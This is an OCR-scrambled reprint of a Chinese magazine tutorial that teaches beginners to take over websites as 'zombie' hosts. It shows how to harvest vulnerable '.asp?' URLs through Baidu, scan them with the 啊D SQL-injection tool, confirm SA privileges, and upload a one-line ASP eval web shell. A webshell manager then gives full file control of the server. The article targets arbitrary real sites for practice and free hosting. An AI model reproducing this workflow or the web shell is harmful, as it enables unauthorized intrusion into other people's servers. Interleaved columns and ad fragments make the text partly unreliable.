admin管理员组

文章数量:1531410

2024年5月10日发(作者:)

维普资讯

●菜鸟如何利用“啊D注入工具”轻松抓肉鸡的方法 

抓肉鸡还得老将出马 一文/图张黎 

许多朋友老是问怎么才能入侵一个网站,也有的朋友问有没有上传木马的空间,或者问怎么拿到一只肉鸡 

玩。其实抓肉鸡是一个很简单的事情,这里我们就再现经典的SQL注入漏洞,包每—个读者都能拿到网站肉鸡。 

搜漏的技巧——寻找有漏洞的主机 

链接地址(如图2)。对SQL注入略有所知的用户,肯 

定都会忍不住打开一个链接,然后开始测试链接是否存 

首先准备的是一个SQL注入工具“啊D注入工具 

在SQL注入漏洞了DE? 

v2.3”,这可是一个经典的SQL注入工具了,不知道什 

个秘不外传的技巧 

么是SQL注入的朋友,可以上网查一下资料。既然拿出 

般的黑客书籍上面,都是教菜鸟们一个一个地检 

“啊D注入工具v2.3”。那么肯定是要进行SQL注入攻 

测链接地址,不管是手工检测也好,还是用工具检测也 

击了。但问题是如何寻找有SQL注入漏洞的主机呢?一 

好,都是非常麻烦的。也许试到头昏眼花,也不一定找 

个非常简单的技巧那就是百度与啊D结合,迅速寻找到 

得到SQL注入漏洞链接地址,其实有更高效的方法可以 

上万台有SQL注入漏洞的网站主机。 

让寻找SQL注入漏洞自动化许多。 

百度找链接 

直接在浏览器地址栏中,复制搜索结果网页 

打开百度搜索,在页面中点击“高级”链接,打开 

的链接地址,这里为“httP://wWW.baidu.com/ 

百度的高级搜索页面。在“包含以下全部的关键词”中 

s?tn=bajduadv&q1=asp%3F&q2=&q3=&q4=&rn= 

输入“.asp?”,将“搜索结果显示条数”设置为“每 

1 OO&l rn=O&ct=O&ft=&q5=2&q6=”。复制后,运行 

页显示1O0条”, “语言”设置为“全部语言”(如 

“啊D注入工具v2.3”,点击左侧边栏中的“注入检 

图1)。将“关键词位置”设置为“仅在网页的URL 

测”一“扫描注入点”,在右边窗口的地址栏中,粘贴 

刚才复制的搜索链接。然后点击地址栏后的“打开网 

页”按钮,在窗口中就会显示刚才的搜索结果页面了 

(如图3)。 

此时,表面看起来与在浏览器中进行搜索没有什么 

两样,但实际上啊D注入工具已经开始自动分析搜索结 

果中的每一个链接地址,并检测是否存在SQL注入漏洞 

中”。最后点击“百度一下”按钮,即可打开搜索结果 

了。在下方的检测框中会显示“正在检测xx个链接”, 

面面了。可以看到页面中显示的搜索结果,都是形如 

多等一会儿,让所有链接检测完毕,然后就可以看到检 

“http://www.….com/*.asp? =”’之类的字符或数字型 

测框中列表显示存在SQL注入漏洞的链接地址了。如果 

在当前页中没有检测到多少漏洞链接,那么可在上方的 

窗口页面中,点击搜索结果下一页链接,继续检测漏洞 

链接。最多一分钟,你就可以看到列表中显示数十个漏 

洞链接地址了(如图4)。 

由于SQL注入攻击曾经很泛滥,因此许多网站都打 

上了SQL注入漏洞的补丁,现在要找存在SQL注入漏洞 

的站点是非常难了。不过巧妙的将百度搜索功能与啊D 

注人工具的页面链接分析检测功能相结合,就可以很轻 

据国外媒体报道・削 漏洞。建议大家尽快升级自爨嚣蠹 嚣薹己的播放器. 器以免成为黑客们的 慧 喜篙 嘉 猎物”。 譬 Net&Tends 51 

维普资讯

查看界面的“检测位置” 

中,输入要查看文件的目 

录路径,点击“开始检 

测”按钮,即可显示该目 

录下的文件及子文件夹 

了。一般来说,网站的路 

径都是位于非系统盘的, 

大部分是位于“D:\WEB” 

中,可以直接查看该路径 

中的文件信息(如图6)。 

如果该文件夹不存在,则 

松的找到成千上万个SQL注入漏洞链接地址了。上面的 

只有从C盘D盘等根目录慢 

搜索结果就有4800多万条,这其中就算只有1%的漏洞 

慢查找网站的路径了。 

概率,也有数十万个漏洞链接地址!菜乌们再也不用担 

上传木马 

心出现漏洞过时,找不到漏洞站点攻击练手的现象了。 

用记事本编写一个后缀名asp的文件,内容如下: 

<%eval request(“pass“1%> 

注意,在写入文件时,上面代码中的“pass”就是 

后面要用到的连接密码,需要改为自己想要的密码。将 

文件保存为“muma asp”,然后在啊D注入工具中,点 

击左侧“相关工具”一“CMD/上传”项,在命令执行 

与上传界面下方的“上传文件”中,点击下方的“本地 

文件”浏览按钮,浏览指定刚才保存的“muma.asp” 

轻松拿下漏洞站点 

文件。在“目标路径”中设定文件保存路径,注意要 

指定保存在网站路径之下,这里为“D:\WEB\muma 

找到了存在SQL注入漏洞的站点后,如何进行攻击 

asp”。最后点击“上传”按钮,就可以成功的将木马 

呢?SQL ̄¥入攻击的方式多种多样,l;kAz:l]猜解管理员密 

上传到网站根目录下了(如图7)。上传完成后。再用 

码和后台登录页面,直接利用xp—cmdshell开3389或上传 

“目录查看”功能,查看一下文件是否上传成功。 

木马等。这里我们选择的当然是最简单的方法,什么权 

限、后台密码破解之类的都不用——利用SA上传木马! 

检测SA权限 

在检测到的漏洞链接地址列表中,右键点击某个漏 

洞链接,在弹出菜单中选择“注入检测”命令,切换到 

“SQL注入检测”界面。点击右边界面中的“检测”按 

钮,将自动检测该链接是否存在SQL注入漏洞,如果存 

在的话,则显示当前数据库类型、用户和权限等信息。 

详细看看下方显示的结果,如果看到“SA”和“多句执 

连接木马 

行”(如图5),那么恭喜小菜们,你基本上可以肯定 

运行桂林老兵的木马后门管理工具 

的拿下这个网站,获得一个肉鸡了! 

“webshe_IConfro『v2 0”,点击菜单“工具”一“shel l

管理”命令,打开Shell管理窗口。在下方的“地址” 

中输入刚才上传的ASP木马链接地址及连接密码,点击 

“连接”按钮,即可连接打开WebshelI。在Webshel {

管理窗口中,可以查 

看任意目录中的文 

件,并可以上传、下 

载或编辑任意文件 

(如图8)。 

现在这台网站服 

务器基本处于我们的 

控制之下了,要上传 

木马,或者将网站作 

为自己的免费空间都是很容易的了。至于进一步提升权 

列目录,找网站路径 限,安装远程控制木马则需要一定的入侵知识,留待小 

点击左侧“相关工具” +“目录查看”,在目录 菜们以后慢慢提高学习吧!ee 

52 Net fnends 蓑誓 釜季喜嘉纂爹霎 喜 _种攻击方法 经演变为大规模网络攻击' 前 有超过加。万个 

本文标签: 链接注入漏洞检测搜索